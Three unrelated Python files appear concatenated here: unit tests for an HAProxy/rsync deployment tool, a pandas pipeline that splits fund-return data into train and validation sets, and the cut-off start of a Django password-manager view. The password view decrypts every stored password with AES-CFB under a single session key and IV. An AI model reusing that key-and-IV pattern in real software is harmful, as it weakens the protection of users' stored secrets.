class TestUtils(unittest.TestCase):
    """Tests for execution.capture output wrapping and execution.haproxy_action."""

    def test_capture_only_stdout(self):
        # A callable returning a plain string yields a single INFO entry.
        entries = execution.capture("lambda", lambda x: 'stdout', 42)
        self.assertEqual(1, len(entries))
        entry = entries[0]
        self.assertEqual('lambda: stdout', entry.message)
        self.assertEqual(execution.Severity.INFO.format(), entry.severity)

    def test_capture_success(self):
        # Exit code 0: stdout becomes INFO, stderr only a WARN.
        entries = execution.capture('success', lambda: (0, "stdout", "stderr"))
        self.assertEqual(2, len(entries))
        self.assertEqual('success: stdout', entries[0].message)
        self.assertEqual('success: stderr', entries[1].message)
        self.assertEqual(execution.Severity.INFO.format(), entries[0].severity)
        self.assertEqual(execution.Severity.WARN.format(), entries[1].severity)

    def test_capture_error(self):
        # Non-zero exit code: stderr is ERROR, plus an extra entry for the code.
        entries = execution.capture('error', lambda: (1, "stdout", "stderr"))
        self.assertEqual(3, len(entries))
        self.assertEqual('error: stdout', entries[0].message)
        self.assertEqual('error: stderr', entries[1].message)
        self.assertEqual('error: exited with code 1', entries[2].message)
        self.assertEqual(execution.Severity.INFO.format(), entries[0].severity)
        self.assertEqual(execution.Severity.ERROR.format(), entries[1].severity)
        self.assertEqual(execution.Severity.ERROR.format(), entries[2].severity)

    @mock.patch('deployment.haproxyapi.haproxy')
    def test_haproxy_action_unnormalized_keys(self, mock):
        # Keys must look like "BACKEND,SERVER"; anything else is rejected.
        with self.assertRaises(execution.InvalidHAProxyKeyFormat):
            execution.haproxy_action("fr-hq-vip-01", ["BADKEY"], "secret", "UP", execution.HAProxyAction.DISABLE)

    # NOTE(review): in the tests below the parameter name `mock` shadows the
    # mock module; kept as-is since the module is not needed inside them.
    @mock.patch('deployment.execution.haproxy', autospec=True)
    def test_haproxy_action_disable(self, mock):
        # Server reports UP, so disabling it is allowed and succeeds.
        mock(None, None).status.side_effect = lambda backend, server: {'status': 'UP'}
        mock(None, None).disable.side_effect = lambda backend, server: "OK"
        execution.haproxy_action("fr-hq-vip-01", ["BACKEND,SERVER-01", "BACKEND,SERVER-02"], "secret", "UP", execution.HAProxyAction.DISABLE)

    @mock.patch('deployment.execution.haproxy', autospec=True)
    def test_haproxy_action_enable(self, mock):
        # Server reports MAINT, so enabling it is allowed and succeeds.
        mock(None, None).status.side_effect = lambda backend, server: {'status': 'MAINT'}
        mock(None, None).enable.side_effect = lambda backend, server: "OK"
        execution.haproxy_action("fr-hq-vip-01", ["BACKEND,SERVER-01", "BACKEND,SERVER-02"], "secret", "MAINT", execution.HAProxyAction.ENABLE)

    @mock.patch('deployment.execution.haproxy', autospec=True)
    def test_haproxy_action_unexpected_status(self, mock):
        # Expected status "UP" does not match the reported MAINT state.
        mock(None, None).status.side_effect = lambda backend, server: {'status': 'MAINT'}
        with self.assertRaises(execution.UnexpectedHAproxyServerStatus):
            execution.haproxy_action("fr-hq-vip-01", ["BACKEND,SERVER-01", "BACKEND,SERVER-02"], "secret", "UP", execution.HAProxyAction.ENABLE)

    @mock.patch('deployment.execution.haproxy', autospec=True)
    def test_haproxy_action_failed(self, mock):
        # The enable call itself returns an error string.
        mock(None, None).status.side_effect = lambda backend, server: {'status': 'MAINT'}
        mock(None, None).enable.side_effect = lambda backend, server: "Error: 42"
        with self.assertRaises(execution.UnexpectedHAproxyServerStatus):
            execution.haproxy_action("fr-hq-vip-01", ["BACKEND,SERVER-01", "BACKEND,SERVER-02"], "secret", "MAINT", execution.HAProxyAction.ENABLE)
class TestSteps(unittest.TestCase):
    """Integration-style tests for the individual deployment step generators.

    Each step under test is a generator that first yields a textual
    description, then zero or more m.LogEntry objects, and finally its
    result; _unwind drives such a generator to completion.

    Fixes over the original: Python-2-only ``generator.next()`` replaced by
    the ``next()`` builtin (works on both 2 and 3), the bare ``unicode``
    reference guarded, and the deprecated/py2-only ``assertNotEquals`` /
    ``assertEquals`` / ``assertItemsEqual`` replaced with portable forms.
    """

    def setUp(self):
        # Fresh throw-away SQLite database per test.
        database.init_db("sqlite:////tmp/test.db")
        database.drop_all()
        database.create_all()
        self.session = database.Session()
        self._load_fixtures(self.session)
        self.admin_user = self.session.query(m.User).get(1)
        self.deploy_user = self.session.query(m.User).get(2)

    def _load_fixtures(self, session):
        """Insert the users/roles/clusters/servers/repos the tests rely on."""
        users = [
            m.User(id=1, email="admin@withings.com", username="admin", accountid="a"),
            m.User(id=2, email="jdoe@withings.com", username="jdoe", accountid="b")
        ]
        clusters = [
            m.Cluster(id=1, haproxy_host='fr-hq-vip-01', name='vip-01'),
            m.Cluster(id=2, haproxy_host='fr-hq-vip-02', name='vip-02'),
        ]
        entities = [
            m.Environment(id=1, repository_id=2, name="dev", clusters=[clusters[1]], target_path="/path"),
            m.Environment(id=2, repository_id=1, name="dev", clusters=[clusters[0]], target_path="/path"),
            m.Role(id=1, name="admin", permissions=json.dumps({'admin': True}), users=[users[0]]),
            m.Role(id=2, name="deployer", permissions=json.dumps({'deploy_business_hours': [1]}), users=[users[1]]),
            m.Server(id=1, name='fr-hq-important-01', activated=True, port=22),
            m.Server(id=2, name='fr-hq-important-02', activated=True, port=22),
            m.Server(id=3, name='fr-hq-important-03', activated=True, port=22),
            m.Server(id=4, name='fr-hq-deactivated-01', activated=False, port=22),
            m.ClusterServerAssociation(server_id=1, cluster_id=1, haproxy_key="IMPORTANT-01"),
            m.ClusterServerAssociation(server_id=2, cluster_id=1, haproxy_key="IMPORTANT-02"),
            m.ClusterServerAssociation(server_id=4, cluster_id=2, haproxy_key=None),
            m.Repository(id=1, name="my repo", git_server="git", deploy_method="inplace"),
            m.Repository(id=2, name="another repo", git_server="git", deploy_method="inplace"),
            m.DeploymentView(id=1, repository_name="my repo", environment_name="dev", environment_id=2, cluster_id=None, server_id=None, branch="master", commit="abcde", user_id=1, status="QUEUED", queued_date=datetime.datetime.now()),
            m.DeploymentView(id=2, repository_name="another repo", environment_name="dev", environment_id=1, cluster_id=None, server_id=4, branch="master", commit="abcde", user_id=1, status="QUEUED", queued_date=datetime.datetime.now())
        ]
        for entity in clusters + users + entities:
            self.session.add(entity)
        self.session.commit()

    def tearDown(self):
        self.session.rollback()
        database.drop_all()
        database.stop_engine()

    def _unwind(self, generator, assert_no_error=False):
        """Drive a step generator; return (last value, yielded log entries).

        Asserts that the first yielded value is a string (the step
        description) and that all following values -- except possibly the
        last one, which is the step result -- are m.LogEntry instances.
        """
        # next(generator) is portable; generator.next() was removed in Python 3.
        step_description = next(generator)
        try:
            # Python 2: descriptions may be byte or unicode strings.
            string_types = (str, unicode)
        except NameError:
            # Python 3: unicode no longer exists; str covers everything.
            string_types = (str,)
        self.assertTrue(isinstance(step_description, string_types))
        entries = []
        out = None
        entry = None
        try:
            while True:
                entry = next(generator)
                if not(isinstance(entry, m.LogEntry)):
                    # A non-LogEntry value must be the final step result.
                    with self.assertRaises(StopIteration):
                        out = next(generator)
                else:
                    entries.append(entry)
                    if assert_no_error:
                        self.assertNotEqual(entry.severity, m.Severity.ERROR.format())
        except StopIteration:
            out = entry
        return out, entries

    def test_load_configuration(self):
        view = self.session.query(m.DeploymentView).get(1)
        self._unwind(execution.check_configuration(view), assert_no_error=True)

    def test_load_configuration_deactivated_servers(self):
        # Deployment view 2 targets server 4, which is deactivated.
        view = self.session.query(m.DeploymentView).get(2)
        _, entries = self._unwind(execution.check_configuration(view))
        self.assertTrue(any(entry.severity == m.Severity.ERROR.format() for entry in entries))

    # 2015-11-28 was a Saturday (the original comment claimed Friday).
    @freeze_time('2015-11-28 15:00')
    def test_check_deploy_allowed_friday_afternoon(self):
        authorized, _ = self._unwind(execution.check_deploy_allowed(self.deploy_user, 1, 'prod'))
        self.assertFalse(authorized)

    # 2015-11-28 was a Saturday; admins may deploy regardless.
    @freeze_time('2015-11-28')
    def test_check_deploy_allowed_super_user(self):
        authorized, _ = self._unwind(execution.check_deploy_allowed(self.admin_user, 1, 'prod'))
        self.assertTrue(authorized)

    # 2015-11-28 was a Saturday (week-end).
    @freeze_time('2015-11-28')
    def test_check_deploy_allowed_weekend(self):
        authorized, _ = self._unwind(execution.check_deploy_allowed(self.deploy_user, 1, 'prod'))
        self.assertFalse(authorized)

    # This is a Wednesday, but 23:00 is outside business hours.
    @freeze_time('2015-11-25 23:00')
    def test_check_deploy_allowed_late(self):
        authorized, _ = self._unwind(execution.check_deploy_allowed(self.deploy_user, 1, 'prod'))
        self.assertFalse(authorized)

    # This is Christmas! Yay!
    @freeze_time('2017-12-25 10:00')
    def test_check_deploy_allowed_bank_holiday(self):
        authorized, _ = self._unwind(execution.check_deploy_allowed(self.deploy_user, 1, 'prod'))
        self.assertFalse(authorized)

    @mock.patch('git.Repo.clone_from')
    def test_clone_repo(self, mock_func):
        self._unwind(execution.clone_repo('/tmp/deploy/my_repo_branch', 'my_repo', 'git'))
        mock_func.assert_called_with('git@git:my_repo', '/tmp/deploy/my_repo_branch')

    def test_run_predeploy(self):
        try:
            repo_path = tempfile.mkdtemp()
            with open(os.path.join(repo_path, 'predeploy.sh'), 'w') as f:
                f.write('echo -n "it works for env $1 commit $2"')
                f.flush()
            _, entries = self._unwind(execution.run_and_delete_predeploy(repo_path, "dev", "abcde"))
            self.assertEqual(2, len(entries))
            entry = entries[0]
            self.assertEqual("predeploy.sh: it works for env dev commit abcde", entry.message)
        finally:
            shutil.rmtree(repo_path)

    @mock.patch('deployment.execution.haproxy_action')
    def test_enable_clusters(self, mock_func):
        servers_1 = [(m.Server(id=1, name='fr-hq-server-01'), "BACKEND,01"), (m.Server(id=2, name='fr-hq-server-02'), "BACKEND,02")]
        servers_2 = [(m.Server(id=3, name='fr-hq-server-03'), "BACKEND,03"), (m.Server(id=4, name='fr-hq-server-04'), "BACKEND,04")]
        cluster_1 = m.Cluster(id=1, name="1", haproxy_host="fr-hq-vip-01")
        cluster_2 = m.Cluster(id=2, name="2", haproxy_host="fr-hq-vip-02")
        # The associations link servers to clusters as a side effect of
        # their construction; the lists themselves are not used directly.
        asso_1 = [m.ClusterServerAssociation(server_def=server, cluster_def=cluster_1, haproxy_key=haproxy_key)
                  for server, haproxy_key in servers_1]
        asso_2 = [m.ClusterServerAssociation(server_def=server, cluster_def=cluster_2, haproxy_key=haproxy_key)
                  for server, haproxy_key in servers_2]
        clusters = [cluster_1, cluster_2]
        self._unwind(execution.enable_clusters(clusters, "secret"))
        mock_func.assert_has_calls([
            mock.call("fr-hq-vip-01", ["BACKEND,01", "BACKEND,02"], "secret", '', execution.HAProxyAction.ENABLE),
            mock.call("fr-hq-vip-02", ["BACKEND,03", "BACKEND,04"], "secret", '', execution.HAProxyAction.ENABLE)
        ])

    @mock.patch('deployment.execution.haproxy_action')
    def test_disable_clusters(self, mock_func):
        servers_1 = [(m.Server(id=1, name='fr-hq-server-01'), "BACKEND,01"), (m.Server(id=2, name='fr-hq-server-02'), "BACKEND,02")]
        servers_2 = [(m.Server(id=3, name='fr-hq-server-03'), "BACKEND,03"), (m.Server(id=4, name='fr-hq-server-04'), "BACKEND,04")]
        cluster_1 = m.Cluster(id=1, name="1", haproxy_host="fr-hq-vip-01")
        cluster_2 = m.Cluster(id=2, name="2", haproxy_host="fr-hq-vip-02")
        asso_1 = [m.ClusterServerAssociation(server_def=server, cluster_def=cluster_1, haproxy_key=haproxy_key)
                  for server, haproxy_key in servers_1]
        asso_2 = [m.ClusterServerAssociation(server_def=server, cluster_def=cluster_2, haproxy_key=haproxy_key)
                  for server, haproxy_key in servers_2]
        clusters = [cluster_1, cluster_2]
        self._unwind(execution.disable_clusters(clusters, "secret"))
        mock_func.assert_has_calls([
            mock.call("fr-hq-vip-01", ["BACKEND,01", "BACKEND,02"], "secret", '', execution.HAProxyAction.DISABLE),
            mock.call("fr-hq-vip-02", ["BACKEND,03", "BACKEND,04"], "secret", '', execution.HAProxyAction.DISABLE)
        ])

    @mock.patch('deployment.execution.haproxy_action')
    def test_ensure_clusters_up(self, mock_func):
        servers_1 = [(m.Server(id=1, name='fr-hq-server-01'), "BACKEND,01"), (m.Server(id=2, name='fr-hq-server-02'), "BACKEND,02")]
        servers_2 = [(m.Server(id=3, name='fr-hq-server-03'), "BACKEND,03"), (m.Server(id=4, name='fr-hq-server-04'), "BACKEND,04")]
        cluster_1 = m.Cluster(id=1, name="1", haproxy_host="fr-hq-vip-01")
        cluster_2 = m.Cluster(id=2, name="2", haproxy_host="fr-hq-vip-02")
        asso_1 = [m.ClusterServerAssociation(server_def=server, cluster_def=cluster_1, haproxy_key=haproxy_key)
                  for server, haproxy_key in servers_1]
        asso_2 = [m.ClusterServerAssociation(server_def=server, cluster_def=cluster_2, haproxy_key=haproxy_key)
                  for server, haproxy_key in servers_2]
        clusters = [cluster_1, cluster_2]
        self._unwind(execution.ensure_clusters_up(clusters, "secret"))
        mock_func.assert_has_calls([
            mock.call("fr-hq-vip-01", ["BACKEND,01", "BACKEND,02"], "secret", 'UP', execution.HAProxyAction.ENABLE),
            mock.call("fr-hq-vip-02", ["BACKEND,03", "BACKEND,04"], "secret", 'UP', execution.HAProxyAction.ENABLE)
        ])

    @freeze_time('2015-11-25 23:00')
    @mock.patch('deployment.executils.exec_cmd', autospec=True)
    @mock.patch('deployment.execution.exec_cmd', autospec=True)
    def test_sync(self, mock_func, mock_func_2):
        mock_func.side_effect = lambda *args, **kwargs: (0, "stdout", "stderr")
        mock_func_2.side_effect = lambda *args, **kwargs: (0, "stdout", "stderr")
        host = executils.Host("fr-hq-deployment-01", "scaleweb", 22)
        self._unwind(execution.parallel_sync("/home/scaleweb/project", "-cr --delete-after", "master", "abcde", "/home/deploy/project/", [host], 1))
        mock_func.assert_has_calls([
            mock.call(["rsync", "-e", "ssh -p 22", "--exclude=.git", "-cr", "--delete-after", "--exclude=.git_release", "/home/deploy/project/", "scaleweb@fr-hq-deployment-01:/home/scaleweb/project/"]),
        ])
        mock_func_2.assert_has_calls([
            mock.call(['ssh', 'scaleweb@fr-hq-deployment-01', '-p', '22', 'mkdir', '-p', "/home/scaleweb/project/"], timeout=600),
            mock.call(['ssh', 'scaleweb@fr-hq-deployment-01', '-p', '22', 'echo', "'master\nabcde\n2015-11-25T23:00:00.000000\n/home/scaleweb/project/'", '>', '/home/scaleweb/project/.git_release'], timeout=600)
        ], any_order=True)  # TODO: investiguate the extra calls without parameters

    @mock.patch('deployment.executils.exec_cmd', autospec=True)
    def test_release_inplace(self, mock_func):
        host = executils.Host("some-server", "scaleweb", 22)
        self._unwind(execution.release(host, "inplace", "/home/scaleweb", "/home/scaleweb/", "project"))
        # assertItemsEqual is Python 2 only; a plain equality check on the
        # (empty) call list is equivalent and portable.
        self.assertEqual(list(mock_func.call_args_list), [])

    @mock.patch('deployment.executils.exec_cmd', autospec=True)
    def test_release_symlink(self, mock_func):
        mock_func.side_effect = lambda *args, **kwargs: (0, "stdout", "stderr")
        host = executils.Host("fr-hq-deployment-01", "scaleweb", 22)
        self._unwind(execution.release(host, "symlink", "/home/scaleweb/", "production", "/home/scaleweb/production_releases/20151204_prod_abcde/"))
        mock_func.assert_called_with(['ssh', 'scaleweb@fr-hq-deployment-01', '-p', '22', 'cd', '/home/scaleweb/', '&&', 'ln', '-s', "/home/scaleweb/production_releases/20151204_prod_abcde/", 'tmp-link', '&&', 'mv', '-T', 'tmp-link', "/home/scaleweb/production"], timeout=600)

    # NOTE(review): decorators apply bottom-up, so mock_script_func actually
    # receives the run_cmd_by_ssh patch and vice versa; harmless here because
    # both get the same side effect.
    @mock.patch('deployment.execution.exec_script_remote', autospec=True)
    @mock.patch('deployment.execution.run_cmd_by_ssh', autospec=True)
    def test_run_deploy(self, mock_script_func, mock_ssh_func):
        mock_script_func.side_effect = lambda *args, **kwargs: (0, "stdout", "stderr")
        mock_ssh_func.side_effect = lambda *args, **kwargs: (0, "stdout", "stderr")
        # Just run the method to catch obvious mistakes
        # It's too complex to write a robust non-trivial test against this (very simple) method.
        host = executils.Host("some-server", "scaleweb", 22)
        self._unwind(execution.run_and_delete_deploy(host, '/home/scaleweb/project', 'dev', 'abcde'), assert_no_error=True)

    @mock.patch('deployment.executils.exec_cmd', autospec=True)
    def test_run_tests(self, mock_func):
        mock_func.side_effect = lambda *args, **kwargs: (0, "ok", "still ok")
        env = self.session.query(m.Environment).get(2)
        host = executils.Host.from_server(env.servers[0], "scaleweb")
        # Remote
        report = execution.run_test(env, "master", "abcde", host=host,
                                    mail_sender="deploy@withings.com", local=False)
        self.assertEqual(False, report.failed)
        # Local
        report = execution.run_test(env, "master", "abcde", host=host,
                                    mail_sender="deploy@withings.com", local=True,
                                    local_repo_path="/home/deploy/project")
        self.assertIsNone(report)

    def test_check_servers_availability(self):
        # Server 1 is attached to cluster 1, so it is busy for deployment 2.
        servers = [self.session.query(m.Server).get(1)]
        ok, entries = self._unwind(execution.check_servers_availability(self.session, 2, servers, "prod", "prod", "abcde"))
        self.assertFalse(ok)
        # Server 4 is free for deployment 2.
        servers = [self.session.query(m.Server).get(4)]
        ok, entries = self._unwind(execution.check_servers_availability(self.session, 2, servers, "prod", "prod", "abcde"))
        self.assertTrue(ok)
class TestSeverity(unittest.TestCase):
    """Severity <-> string conversions are mutually consistent."""

    def test_severity_format(self):
        # Each enum member must serialize to its lower-case wire string.
        for severity, text in ((execution.Severity.INFO, "info"),
                               (execution.Severity.WARN, "warn"),
                               (execution.Severity.ERROR, "error")):
            self.assertEqual(text, severity.format())

    def test_severity_from_string(self):
        # Each wire string must parse back to the matching enum member.
        for text, severity in (("info", execution.Severity.INFO),
                               ("warn", execution.Severity.WARN),
                               ("error", execution.Severity.ERROR)):
            self.assertEqual(severity, execution.Severity.from_string(text))
|
import os
from datetime import datetime
import pandas as pd
from constants import FUND_LIST, FOLDER, FILES, FILES_PATH, FUND_NAME_COL, \
FUND_DIV, FUND_MONTH, FUND_FEATURES, FMFUNDCLASSINFOC_ID, DATE, PROFIT, PERFORMANCEID, \
BEGIN_DATE_FOR_TEST, FIRST_DATE, TRAIN_DATA, VALIDATE_DATA, FUND_FEATURES, END_DATE, \
FEATURE_TRAIN_DATA, FEATURE_VALIDATE_DATA, FUND_NUMBER, RAW_TRAIN_DATA, \
RAW_VALIDATE_DATA, RAW_DATA, NEWS_DATA
class FundDataHandler():
    """Loads raw fund/feature/news CSVs, cleans them and writes the
    train/validation CSV splits used downstream.

    All input/output paths and column names come from the constants module.

    Fixes over the original: ``FOUND_NAME_COL`` typo (NameError; the imported
    constant is ``FUND_NAME_COL``), deprecated ``DataFrame.append`` and the
    ``if df_fund:`` DataFrame-truthiness ValueError in read_fund, undefined
    names in get_date_between, the ignored ``date`` parameter in
    check_first_date_valid, and a bare ``except``.
    """

    def __init__(self):
        # NOTE(review): df_fund_div is left unloaded; check_fund_div_by_id
        # will raise AttributeError until this line is re-enabled.
        #self.df_fund_div = pd.read_csv(FUND_DIV)
        self.df_raw = pd.read_csv(RAW_DATA)        # raw daily prices
        self.df_fund = pd.read_csv(FUND_MONTH)     # monthly fund returns
        self.df_features = pd.read_csv(FUND_FEATURES)
        self.df_news = pd.read_csv(NEWS_DATA)
        self.df_features = self.df_features.drop(columns=['index'])
        self.fund_list = FUND_LIST

    def get_news_data(self, df):
        """Average per-article sentiment labels per date, scaled into (-1, 1)."""
        dates = list(set(df['Date']))
        vals = []
        for date in dates:
            val = df[df['Date'] == date]['label'].mean()
            vals.append(val)
        # Normalise by (max |value| + 1) so results stay strictly inside (-1, 1).
        max_val = abs(max(vals, key=abs)) + 1
        vals = [val / max_val for val in vals]
        df_res = pd.DataFrame(data={'NEWS': vals})
        df_res.index = dates
        df_res.index.name = 'Date'
        df_res = df_res.sort_index(ascending=True)
        # Forward-fill gaps, then fall back to the column mean.
        df_res = df_res.ffill().fillna(df_res.mean())
        return df_res

    def get_raw_data(self):
        """Pivot the raw price table into one SELL_PRICE column per fund."""
        frames = []
        for f in self.fund_list:
            df_tmp = self.df_raw[self.df_raw['ISIN_CDE'] == f]
            df_tmp_price = df_tmp['SELL_PRICE']
            df_tmp_price.index = df_tmp['PRICE_DATE']
            df_tmp_price.index.name = 'Date'
            frames.append(df_tmp_price)
        df_res = pd.concat(frames, axis=1).sort_index(ascending=True)
        df_res.columns = self.fund_list
        df_res.index.name = 'Date'
        return df_res

    def handle_date(self, df, index):
        """Snap every date in column *index* to the first of a month.

        Days <= 15 are attributed to the same month; later days roll over to
        the first of the following month (December rolls into January of the
        next year). The result is stored in df['Date']; *df* is mutated in
        place and also returned.
        """
        new_dates = []
        for date in df[index]:
            y, m, d = date.split('-')
            if int(d) <= 15:
                # Early in the month: attribute to this month.
                n_y, n_m = y, m
            elif m == '12':
                # Late in December: roll over to January of the next year.
                n_y, n_m = str(int(y) + 1), '01'
            else:
                # Late in the month: attribute to the next month.
                n_y, n_m = y, str(int(m) + 1)
            new_dates.append('-'.join([n_y, n_m.zfill(2), '01']))
        df['Date'] = new_dates
        return df

    def change_to_pct(self, df):
        """Index by 'Date' and convert every column to percent change."""
        df.index = df['Date']
        res = df.drop(columns=['Date'], axis=1)
        return res.pct_change()

    def filter_cols(self, df, cols):
        """Return only the given columns."""
        return df[cols]

    def read_fund(self):
        """Concatenate all per-file fund CSVs into a single DataFrame.

        Bug fix: the original referenced the undefined name FOUND_NAME_COL
        (NameError; the imported constant is FUND_NAME_COL), used the
        deprecated DataFrame.append (removed in pandas 2.0), and tested
        ``if df_fund:``, which raises ValueError on a DataFrame.
        """
        return pd.concat(pd.read_csv(f, names=FUND_NAME_COL) for f in FILES_PATH)

    def _base_check_fund_id(self, df, key, val):
        """Return rows where df[key] == val; raise if none exist."""
        res = df.loc[df[key] == val]
        if res.empty:
            raise Exception('{0} == {1} not exist'.format(key, val))
        return res

    def select_fund_by_pfid(self, _id):
        """Rows of the monthly table for one performance id."""
        return self._base_check_fund_id(self.df_fund, PERFORMANCEID, _id)

    def check_fund_div_by_id(self, _id):
        """Map a class-info id to its performance id via the dividend table."""
        # NOTE(review): relies on self.df_fund_div, whose load is commented
        # out in __init__ -- AttributeError until re-enabled. TODO confirm.
        res = self._base_check_fund_id(self.df_fund_div, FMFUNDCLASSINFOC_ID, _id)
        return res.iloc[0][PERFORMANCEID]

    def select_fund_by_id(self, _id):
        """Rows of the monthly table for one class-info id."""
        return self._base_check_fund_id(self.df_fund, FMFUNDCLASSINFOC_ID, _id)

    def get_fund_profit_by_id(self, _id):
        """PROFIT series (indexed by DATE) for one class-info id."""
        res = self.select_fund_by_id(_id)
        res.index = res[DATE]
        return res[PROFIT]

    def get_fund_profit_by_pfid(self, _id):
        """RET1M series (indexed by DATAYM) for one performance id."""
        res = self.select_fund_by_pfid(_id)
        res.index = res['DATAYM']
        return res['RET1M']

    def combine_fund_profit_by_id(self, ids=None):
        """Combine per-fund profit series (by class-info id) into one frame.

        ids: iterable of class-info ids. Defaults to the module-level
        FMFUNDCLASSINFOC_IDS for backward compatibility.
        """
        # NOTE(review): FMFUNDCLASSINFOC_IDS is neither defined here nor
        # imported from constants, so calling without *ids* raises NameError
        # exactly as the original did -- TODO confirm the intended source.
        if ids is None:
            ids = FMFUNDCLASSINFOC_IDS
        frames = []
        performance_ids = []
        for _id in ids:
            performance_ids.append(self.check_fund_div_by_id(_id))
            frames.append(self.get_fund_profit_by_id(_id))
        df_res = pd.concat(frames, axis=1).sort_index(ascending=True)
        df_res.columns = performance_ids
        return df_res

    def filter_date(self, df, first_date, end_date):
        """Label-slice df to [first_date, end_date] (inclusive on both ends)."""
        return df[first_date:end_date]

    def get_date_between(self, df, first_date, end_date):
        """Positional slice from first_date up to (excluding) end_date.

        Bug fix: the original used the undefined names first_row_number /
        end_row_number (NameError). They are now resolved from the index.
        """
        first_row_number = df.index.get_loc(first_date)
        end_row_number = df.index.get_loc(end_date)
        return df[first_row_number:end_row_number]

    def check_first_date_valid(self, df, date):
        """Split column names into (valid, invalid) by first non-NaN date.

        A column is valid when its first valid index is on or before *date*.
        Bug fix: the original ignored the *date* parameter and always used
        the FIRST_DATE constant; every call site passes FIRST_DATE, so using
        the parameter is behaviour-compatible.
        """
        res_valid = []
        res_invalid = []
        for col in df.columns:
            first_valid_date = df[col].first_valid_index()
            if datetime.strptime(first_valid_date, '%Y-%m-%d') > datetime.strptime(date, '%Y-%m-%d'):
                print('[WARNING] {} first valid date {} is earlier first date {}'.format(col, first_valid_date, date))
                res_invalid.append(col)
            else:
                print('[INFO] {} is valid date'.format(col))
                res_valid.append(col)
        return res_valid, res_invalid

    def combine_fund_profit_by_pfid(self):
        """Combine monthly returns per performance id into one frame."""
        frames = []
        ids = []
        for _id in self.fund_list:
            try:
                df_profit = self.get_fund_profit_by_pfid(_id)
            except Exception:
                # Narrowed from a bare except: ids missing from the source
                # file are skipped with a warning.
                print('[WARNING] {0} not found'.format(_id))
                continue
            ids.append(_id)
            frames.append(df_profit)
        df_res = pd.concat(frames, axis=1).sort_index(ascending=True)
        df_res.columns = ids
        df_res.index.name = 'Date'
        return df_res

    def combine_df(self, df_list):
        """Column-wise concat; forward-fill then mean-fill missing values."""
        df_res = pd.concat(df_list, axis=1).sort_index(ascending=True)
        df_res.index.name = 'Date'
        df_res = df_res.ffill().fillna(df_res.mean())
        return df_res

    def fund_profit_to_csv(self, df, path, col):
        """Write *df* to *path* with index level *col* restored as a column."""
        df = df.reset_index(level=[col])
        df.to_csv(path, index=False)

    def seperate_train_test(self, df, date):
        """Label-split at *date* ('YYYY-MM-DD' string).

        Both halves include the boundary row (pandas label slicing is
        inclusive). Method name kept as-is (sic) for backward compatibility.
        """
        df_train = df[:date]
        df_validation = df[date:]
        return df_train, df_validation

    def handle_news(self):
        """Clean the news sentiment table and clip it to the study window."""
        df_news = self.handle_date(self.df_news, 'date')
        df_news = self.get_news_data(df_news)
        f_valid, f_invalid = self.check_first_date_valid(df_news, FIRST_DATE)
        df_news = self.filter_cols(df_news, f_valid)
        df_news = self.filter_date(df_news, FIRST_DATE, END_DATE)
        return df_news

    def handle_features(self):
        """Clean the feature table and clip it to the study window."""
        df_features = self.handle_date(self.df_features, 'Date')
        # handle_date mutates and returns the same frame, so passing the
        # returned object (instead of self.df_features again, as the
        # original did) is equivalent but clearer.
        df_features = self.change_to_pct(df_features)
        f_valid, f_invalid = self.check_first_date_valid(df_features, FIRST_DATE)
        df_features = self.filter_cols(df_features, f_valid)
        df_features = self.filter_date(df_features, FIRST_DATE, END_DATE)
        return df_features

    def handle_funds(self):
        """Build the fund-returns frame clipped to the study window."""
        df_fund = self.combine_fund_profit_by_pfid()
        valid, invalid = self.check_first_date_valid(df_fund, FIRST_DATE)
        df_fund = self.filter_cols(df_fund, valid[:FUND_NUMBER])
        df_fund = self.filter_date(df_fund, FIRST_DATE, END_DATE)
        return df_fund

    def handle_raw(self):
        """Build the raw-price frame clipped to the study window."""
        df_raw = self.get_raw_data()
        valid, invalid = self.check_first_date_valid(df_raw, FIRST_DATE)
        df_raw = self.filter_cols(df_raw, valid[:FUND_NUMBER])
        df_raw = self.filter_date(df_raw, FIRST_DATE, END_DATE)
        return df_raw

    def run(self):
        """Regenerate every train/validation CSV split."""
        df_features = self.handle_features()
        df_funds = self.handle_funds()
        df_raw = self.handle_raw()
        df_news = self.handle_news()
        # Features and funds must cover exactly the same dates.
        if len(df_features.index) != len(df_funds.index):
            raise Exception('[ERROR] Index not the same')
        # Combine fund returns, features and news into one feature matrix.
        df_features = self.combine_df([df_funds, df_features, df_news])
        print(df_features.head())
        # Separate and save raw prices.
        df_raw_train, df_raw_validation = self.seperate_train_test(df_raw, BEGIN_DATE_FOR_TEST)
        self.fund_profit_to_csv(df_raw_train, RAW_TRAIN_DATA, 'Date')
        self.fund_profit_to_csv(df_raw_validation, RAW_VALIDATE_DATA, 'Date')
        # Separate and save features.
        df_feature_train, df_feature_validation = self.seperate_train_test(df_features, BEGIN_DATE_FOR_TEST)
        self.fund_profit_to_csv(df_feature_train, FEATURE_TRAIN_DATA, 'Date')
        self.fund_profit_to_csv(df_feature_validation, FEATURE_VALIDATE_DATA, 'Date')
        # Separate and save fund returns.
        df_train, df_validation = self.seperate_train_test(df_funds, BEGIN_DATE_FOR_TEST)
        self.fund_profit_to_csv(df_train, TRAIN_DATA, 'Date')
        self.fund_profit_to_csv(df_validation, VALIDATE_DATA, 'Date')

    def test(self):
        """Ad-hoc sanity check: the news column must contain no NaNs."""
        df_news = self.handle_news()
        print(df_news['NEWS'].isnull().values.any())
if __name__ == '__main__':
    # Entry point: build the handler (loads every CSV from the constants
    # module) and regenerate all train/validation output files.
    fdh = FundDataHandler()
    fdh.run()
    #fdh.test()
|
from django.http import HttpResponse, HttpResponseRedirect
from django.db.models import Q
from django.template import loader
from django.shortcuts import render, redirect
from django.utils.crypto import get_random_string, pbkdf2, salted_hmac
from django.contrib.auth.hashers import check_password
from django.contrib.auth.models import User
from django.contrib.auth import logout
from django.contrib.postgres.search import TrigramSimilarity
from django.db.models.functions import Greatest
from django_otp.decorators import otp_required
from django.contrib.auth.decorators import login_required
from django.contrib.auth.forms import PasswordChangeForm
from django.contrib.auth import update_session_auth_hash
from django.contrib import messages
from .models import Passwords
from .forms import PasswordForm, GeneratePasswordForm, EditPasswordForm
from Crypto.Cipher import AES
from random import randint
import string
@login_required
def index(request):
    """List the current user's stored passwords, decrypted for display."""
    # The AES key/IV only exist in the session after verify_pw succeeds.
    if 'cipherKey' not in request.session:
        return redirect('verify_pw')
    template = loader.get_template('password/index.html')
    context = {}
    if request.user.is_authenticated:
        key = bytes.fromhex(request.session.get('cipherKey'))
        iv = bytes.fromhex(request.session.get('iv'))
        data = Passwords.objects.filter(user=request.user)
        for obj in data:
            # CFB mode keeps internal state, so each record needs a fresh cipher.
            cipher = AES.new(key, AES.MODE_CFB, iv)
